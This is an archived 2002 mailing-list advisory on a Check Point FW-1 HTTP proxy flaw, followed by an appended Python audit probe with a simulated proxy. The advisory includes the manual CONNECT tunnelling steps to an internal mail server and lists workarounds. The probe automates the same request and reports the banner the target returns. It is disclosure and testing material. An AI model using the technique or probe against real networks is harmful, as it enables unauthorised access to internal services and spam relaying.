CheckPoint FW1 HTTP Security Hole

From: Volker Tanger (volker.tangerat_private)
Date: Tue Feb 19 2002 - 07:05:22 PST


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    Greetings!
    
    A quite well-known proxy vulnerability was found in FW1 V4.1 SP5 (plus
    hotfixes) - thanks to Ryan Snyder for announcing the first bits on the
    Firewall-1 mailing list.
    
    If you connect via the HTTP proxy to a server you are allowed to
    connect to (e.g. a common rule is "Any / WebServer / http->resource"),
    you can then use the CONNECT method to connect to a different server,
    e.g. an internal mailserver.
    
    Example:
    	you = 6.6.6.666
    	Webserver = 1.1.1.1
    	Internal Mailserver = 2.2.2.2
    
    	Rule allows:  Any  Webserver http->resource
    
    	connect with "telnet 1.1.1.1 80" to the webserver and enter
    	CONNECT 2.2.2.2:25 / HTTP/1.0
    
    	response: mail server banner - and running SMTP session e.g.
    	to send SPAM from.
    
    You can connect to any TCP port on any machine the firewall
    can connect to. Telnet, SMTP, POP, etc.
    
    Restrictions found:
    	- connects are only possible if the firewall module
    	  is allowed access (i.e. via policy/properties,
    	  specific rules or "Any  (dst) (svc)..." rules)
    	- you have to allow "CONNECT" - it is enabled if you allowed
    	  the "Tunneling" (General tab) connection method or did not
    	  delete the "*" in "Other" Methods (Match tab)
    
    Fast workarounds:
    	- Change your resource settings to filter out CONNECT
    	  commands, i.e.
    		* disable HTTP tunneling
    		* check that the "Other" method is specified NOT to
    		  match CONNECT (i.e. remove the default wildcard)
    	- disallow access from the firewall module (->Properties)
    	- replace in all your rules containing the service
    	  HTTP+Resource this part with plain HTTP. Yes, you lose
    	  some content security but at least you don't compromise
    	  your other servers
    
    
    The thing that really concerns me is that this general problem has
    been a known issue with plain HTTP proxies like Squid for ages
    (see e.g. http://www.squid-cache.org/Doc/FAQ/FAQ-10.html#ss10.14).
    And why didn't Checkpoint prevent or at least document this?
    
    Puzzled
    	Volker
    
    - --
    
    - -------------------------------------------------------------------
    volker.tangerat_private                                 discon GmbH
    IT-Security Consulting                           Wrangelstrasse 100
    http://www.discon.de/                         10997 Berlin, Germany
    - -------------------------------------------------------------------
    PGP-Fingerprint: 5323 a4f7 a7c2 b8ef 4653 05ce d2ea 2b74  b94c c68e
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (MingW32) - WinPT v0.0.3 (WINNT)
    Comment: This is the WinPT config test
    
    iEYEARECAAYFAjxyaZgACgkQ0uordLlMxo6yhQCeIzM/tWK3HCEVM/V816WSFpgh
    YhMAoJX/uDKzPE1NKO9XKzizs3sxZWiW
    =XumZ
    -----END PGP SIGNATURE-----
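The probe the message describes ("telnet 1.1.1.1 80", then "CONNECT 2.2.2.2:25 / HTTP/1.0"), written as a small Python checker so it can be run against a proxy or a firewall HTTP resource during an audit. This is an added example, not code from the original message or from Check Point; the target addresses, the simulated front end and the SMTP banner it returns are constructed test fixtures. The block also carries a minimal fake proxy with two modes, one honouring CONNECT the way the post says the FW-1 resource does, one refusing it the way the workarounds intend, so the checker can be exercised offline.

```python
"""Probe an HTTP proxy (or a firewall HTTP 'resource' acting as one) for
open CONNECT tunnelling.  Added example; hosts, ports and banners are made up."""
import socket
import socketserver
import threading


def build_connect_request(host: str, port: int) -> bytes:
    # Same request the post types by hand into "telnet 1.1.1.1 80".
    return f"CONNECT {host}:{port} HTTP/1.0\r\nHost: {host}:{port}\r\n\r\n".encode()


def parse_connect_response(data: bytes):
    """Return (status_code, bytes_after_headers).
    status_code is None when the peer did not send an HTTP status line."""
    head, _sep, rest = data.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].split(b" ", 2)
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/") or not parts[1].isdigit():
        return None, data
    return int(parts[1]), rest


def probe_connect_tunnel(proxy_host, proxy_port, target_host, target_port, timeout=5.0):
    """Return (tunnel_open, banner).  tunnel_open is True when the proxy answers
    2xx to CONNECT; banner is whatever the far end then sends (e.g. an SMTP
    greeting), which is the evidence that internal hosts are reachable."""
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as s:
        s.sendall(build_connect_request(target_host, target_port))
        data = b""
        while b"\r\n\r\n" not in data:          # read until the header block ends
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
        status, banner = parse_connect_response(data)
        if status is None or not 200 <= status < 300:
            return False, b""
        if not banner:                          # banner may arrive in a later segment
            try:
                banner = s.recv(4096)
            except socket.timeout:
                banner = b""
        return True, banner.strip()


class _FakeFrontEnd(socketserver.BaseRequestHandler):
    """Constructed stand-in for the firewall HTTP resource.  With
    server.allow_connect=True it tunnels any CONNECT and the simulated internal
    mail server greets us; with False it refuses, as the workarounds intend."""

    def handle(self):
        req = b""
        while b"\r\n\r\n" not in req:
            chunk = self.request.recv(4096)
            if not chunk:
                return
            req += chunk
        if req.startswith(b"CONNECT ") and self.server.allow_connect:
            self.request.sendall(b"HTTP/1.0 200 Connection established\r\n\r\n")
            self.request.sendall(b"220 mail.internal.example ESMTP ready\r\n")  # constructed
        else:
            self.request.sendall(b"HTTP/1.0 405 Method Not Allowed\r\n\r\n")


def start_fake_front_end(allow_connect: bool):
    """Start the simulated front end on a free loopback port and return it."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), _FakeFrontEnd)
    srv.allow_connect = allow_connect
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    for allow in (True, False):
        srv = start_fake_front_end(allow)
        # 2.2.2.2:25 is the post's example internal mail server; never contacted here.
        print("tunnelling" if allow else "refusing",
              probe_connect_tunnel("127.0.0.1", srv.server_address[1], "2.2.2.2", 25))
        srv.shutdown()
        srv.server_close()
```

To test a real front end, point `probe_connect_tunnel` at the address that the "Any / WebServer / http->resource" rule lets you reach and name an internal host as the CONNECT target; a 2xx followed by a banner from that host confirms the tunnel, while a 4xx or a dropped connection shows the method filter is in effect. Run it from outside the perimeter, since the post notes the tunnel only reaches what the firewall module itself is permitted to connect to.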
    



    This archive was generated by hypermail 2b30 : Tue Feb 19 2002 - 15:44:15 PST